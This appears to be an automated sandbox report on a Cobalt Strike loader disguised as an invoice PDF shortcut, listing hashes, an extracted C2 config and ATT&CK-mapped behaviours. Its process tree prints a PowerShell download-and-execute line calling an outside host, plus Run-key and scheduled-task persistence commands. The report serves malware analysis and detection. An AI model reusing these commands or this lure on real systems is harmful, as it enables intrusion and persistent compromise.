cobaltstrike | 0135c4f45de3e2187708033da3135210b03c9db4275dfa794dbcbff21b4f4df9

General

Target

Overdue_Invoice_2023B.pdf.lnk
Size

1KB
MD5

094815ab6988cda2101381cbeeb0056e
SHA1

df5f22ce9d8e0ee3ebca101f5112c6456088d317
SHA256

0135c4f45de3e2187708033da3135210b03c9db4275dfa794dbcbff21b4f4df9
SHA512

c8f3aae210a0157275c0f24e9175ef9d508c55fd5c8e48e6c10e95a79a9f41927d5574dc5197c9594f6fbfefe3eb19f851570c6bb5e0eaecd6311731e26e4363

Score

10^/10

cobaltstrike 987654321 backdoor persistence trojan

Malware Config

Extracted

Family

cobaltstrike

Botnet

987654321

C2

http://185.225.74.52:443/favicon.js

Attributes

access_type
512
beacon_type
2048
host
185.225.74.52,/favicon.js
http_header1
AAAAEAAAABpIb3N0OiBidXNpbmVzc3NlcnZpY2VzLmNvbQAAAAoAAAARQ29ubmVjdGlvbjogY2xvc2UAAAAKAAAAE0FjY2VwdC1FbmNvZGluZzogYnIAAAAKAAAAFkFjY2VwdC1MYW5ndWFnZTogZW4tVVMAAAAHAAAAAAAAAA0AAAADAAAAAgAAABp3b29jb21tZXJjZV9pdGVtc19pbl9jYXJ0PQAAAAYAAAAGQ29va2llAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
http_header2
AAAAEAAAABpIb3N0OiBidXNpbmVzc3NlcnZpY2VzLmNvbQAAAAoAAAARQ29ubmVjdGlvbjogY2xvc2UAAAAKAAAAGUFjY2VwdC1FbmNvZGluZzogZ3ppcCwgYnIAAAAKAAAAL0NvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkAAAABwAAAAEAAAANAAAAAwAAAAIAAAAIZGV0YWlscz0AAAAEAAAABwAAAAAAAAADAAAAAgAAAA5fX3Nlc3Npb25fX2lkPQAAAAYAAAAGQ29va2llAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
http_method1
GET
http_method2
POST
jitter
9472
polling_time
55991
port_number
443
sc_process32
%windir%\syswow64\dllhost.exe
sc_process64
%windir%\sysnative\dllhost.exe
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCMEuNG3asVOp+bgSmSog10bB55R9e+aj5dF2sVbnRjA/dTkltRdDD0DdF5vJh/gURBikZ4FxqqmfqR2SPAheOzDDrYvV7ScpwPkZe8IUd/DbJmPs30ST9SGHn+eLjTQQEU+I142t7yTsO7HCKf1CTDMHfS3PNoz3V8ivNRwL1aiQIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
unknown1
9.63976192e+08
unknown2
AAAABAAAAAIAAANxAAAAAwAAAA0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
uri
/btn_bg
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/42.0.2311.135
watermark
987654321

Signatures

Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
trojan backdoor cobaltstrike
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

RuntimeBroker.exe

description pid process target process

PID 4988 created 740 4988 RuntimeBroker.exe Explorer.EXE
PID 4988 created 740 4988 RuntimeBroker.exe Explorer.EXE
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

12 2260 powershell.exe
15 2008 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation cmd.exe
Executes dropped EXE 1 IoCs

Processes:

RuntimeBroker.exe

pid process

4988 RuntimeBroker.exe
Loads dropped DLL 1 IoCs

Processes:

RuntimeBroker.exe

pid process

4988 RuntimeBroker.exe

description	pid	process	target process
PID 4988 created 740	4988	RuntimeBroker.exe	Explorer.EXE
PID 4988 created 740	4988	RuntimeBroker.exe	Explorer.EXE

flow	pid	process
12	2260	powershell.exe
15	2008	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	cmd.exe

pid	process
4988	RuntimeBroker.exe

pid	process
4988	RuntimeBroker.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftLibrary = "powershell.exe -noP -sta -w 1 Set-Location -Path $env:Public\\Libraries\\MicrosoftLibrary; Start-Process $env:Public\\Libraries\\MicrosoftLibrary\\RuntimeBroker.exe\""	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AcroRd32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1032 schtasks.exe

pid	process
1032	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\Local Settings powershell.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4404 reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\Local Settings	powershell.exe

pid	process
4404	reg.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

Processes:

powershell.exepowershell.exeRuntimeBroker.exeAcroRd32.exe

pid	process
2260	powershell.exe
2260	powershell.exe
2008	powershell.exe
2008	powershell.exe
4988	RuntimeBroker.exe
4988	RuntimeBroker.exe
4168	AcroRd32.exe
4168	AcroRd32.exe
4168	AcroRd32.exe
4168	AcroRd32.exe
4168	AcroRd32.exe
4168	AcroRd32.exe
4168	AcroRd32.exe
4168	AcroRd32.exe
4168	AcroRd32.exe
4168	AcroRd32.exe
4168	AcroRd32.exe
4168	AcroRd32.exe
4168	AcroRd32.exe
4168	AcroRd32.exe
4168	AcroRd32.exe
4168	AcroRd32.exe
4168	AcroRd32.exe
4168	AcroRd32.exe
4168	AcroRd32.exe
4168	AcroRd32.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

Processes:

RuntimeBroker.exe

pid process

4988 RuntimeBroker.exe
4988 RuntimeBroker.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2260 powershell.exe
Token: SeDebugPrivilege 2008 powershell.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

AcroRd32.exe

pid process

4168 AcroRd32.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

AcroRd32.exe

pid process

4168 AcroRd32.exe
4168 AcroRd32.exe
4168 AcroRd32.exe
4168 AcroRd32.exe
4168 AcroRd32.exe
4168 AcroRd32.exe

pid	process
4988	RuntimeBroker.exe
4988	RuntimeBroker.exe

description	pid	process
Token: SeDebugPrivilege	2260	powershell.exe
Token: SeDebugPrivilege	2008	powershell.exe

pid	process
4168	AcroRd32.exe

pid	process
4168	AcroRd32.exe
4168	AcroRd32.exe
4168	AcroRd32.exe
4168	AcroRd32.exe
4168	AcroRd32.exe
4168	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.exepowershell.exeAcroRd32.exeRdrCEF.exe

description	pid	process	target process
PID 4736 wrote to memory of 2260	4736	cmd.exe	powershell.exe
PID 4736 wrote to memory of 2260	4736	cmd.exe	powershell.exe
PID 4736 wrote to memory of 2260	4736	cmd.exe	powershell.exe
PID 2260 wrote to memory of 2008	2260	powershell.exe	powershell.exe
PID 2260 wrote to memory of 2008	2260	powershell.exe	powershell.exe
PID 2260 wrote to memory of 2008	2260	powershell.exe	powershell.exe
PID 2008 wrote to memory of 4168	2008	powershell.exe	AcroRd32.exe
PID 2008 wrote to memory of 4168	2008	powershell.exe	AcroRd32.exe
PID 2008 wrote to memory of 4168	2008	powershell.exe	AcroRd32.exe
PID 2008 wrote to memory of 5008	2008	powershell.exe	attrib.exe
PID 2008 wrote to memory of 5008	2008	powershell.exe	attrib.exe
PID 2008 wrote to memory of 5008	2008	powershell.exe	attrib.exe
PID 4168 wrote to memory of 2280	4168	AcroRd32.exe	RdrCEF.exe
PID 4168 wrote to memory of 2280	4168	AcroRd32.exe	RdrCEF.exe
PID 4168 wrote to memory of 2280	4168	AcroRd32.exe	RdrCEF.exe
PID 2008 wrote to memory of 4988	2008	powershell.exe	RuntimeBroker.exe
PID 2008 wrote to memory of 4988	2008	powershell.exe	RuntimeBroker.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 4088	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 3372	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 3372	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 3372	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 3372	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 3372	2280	RdrCEF.exe	RdrCEF.exe
PID 2280 wrote to memory of 3372	2280	RdrCEF.exe	RdrCEF.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

5008 attrib.exe

pid	process
5008	attrib.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:740

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Overdue_Invoice_2023B.pdf.lnk
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4736

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 Invoke-WebRequest 'http://billingservice.hopto.org/UY7G6S/s4Nt4.txt' -UseBasicParsing | Select-Object -Expand Content | powershell
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2260

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
4⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2008

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\Invoice.pdf"
5⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4168

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
6⤵
- Suspicious use of WriteProcessMemory
PID:2280

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=CCC5E39B1935A27074417C7D391DD486 --mojo-platform-channel-handle=1744 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
7⤵
PID:4088

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=EC913024932E32653059E9D83EBE4273 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=EC913024932E32653059E9D83EBE4273 --renderer-client-id=2 --mojo-platform-channel-handle=1812 --allow-no-sandbox-job /prefetch:1
7⤵
PID:3372

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=20364CE6D8CD753AAAE46B895A2D238B --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=20364CE6D8CD753AAAE46B895A2D238B --renderer-client-id=4 --mojo-platform-channel-handle=2176 --allow-no-sandbox-job /prefetch:1
7⤵
PID:3856

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=B8A79CB2EFA05472B7D094E20F5E8781 --mojo-platform-channel-handle=2552 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
7⤵
PID:4256

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=633CA2CFECBD2A73770EE4E093EC7F0C --mojo-platform-channel-handle=2852 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
7⤵
PID:1172

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=C13F44CDE3889523BCB76F1188528526 --mojo-platform-channel-handle=2920 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
7⤵
PID:2208

C:\Windows\SysWOW64\attrib.exe
"C:\Windows\system32\attrib.exe" +h C:\Users\Admin\AppData\Local\Temp\dae3a0e8-6da7-4323-b0a1-7443d70eb8b1
5⤵
- Views/modifies file attributes
PID:5008

C:\Users\Admin\AppData\Local\Temp\dae3a0e8-6da7-4323-b0a1-7443d70eb8b1\RuntimeBroker.exe
"C:\Users\Admin\AppData\Local\Temp\dae3a0e8-6da7-4323-b0a1-7443d70eb8b1\RuntimeBroker.exe"
5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:4988

C:\Windows\System32\cmd.exe
/C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftLibrary /t REG_SZ /d "powershell.exe -noP -sta -w 1 Set-Location -Path $env:Public\Libraries\MicrosoftLibrary; Start-Process $env:Public\Libraries\MicrosoftLibrary\RuntimeBroker.exe"" /f
6⤵
PID:4024

C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftLibrary /t REG_SZ /d "powershell.exe -noP -sta -w 1 Set-Location -Path $env:Public\Libraries\MicrosoftLibrary; Start-Process $env:Public\Libraries\MicrosoftLibrary\RuntimeBroker.exe"" /f
7⤵
- Adds Run key to start application
- Modifies registry key
PID:4404

C:\Windows\System32\schtasks.exe
/F /Create /TN Microsoft_Library /sc minute /MO 80 /TR "powershell.exe -WindowStyle hidden -noP -sta -w 1 Set-Location -Path $env:Public\Libraries\MicrosoftLibrary; Start-Process $env:Public\Libraries\MicrosoftLibrary\RuntimeBroker.exe
6⤵
- Creates scheduled task(s)
PID:1032

C:\windows\system32\wermgr.exe
"C:\windows\system32\wermgr.exe"
2⤵
PID:3256

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

1

T1060

Scheduled Task

1

T1053

Hidden Files and Directories

1

T1158

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

3

T1112

Hidden Files and Directories

1

T1158

Credential Access

Discovery

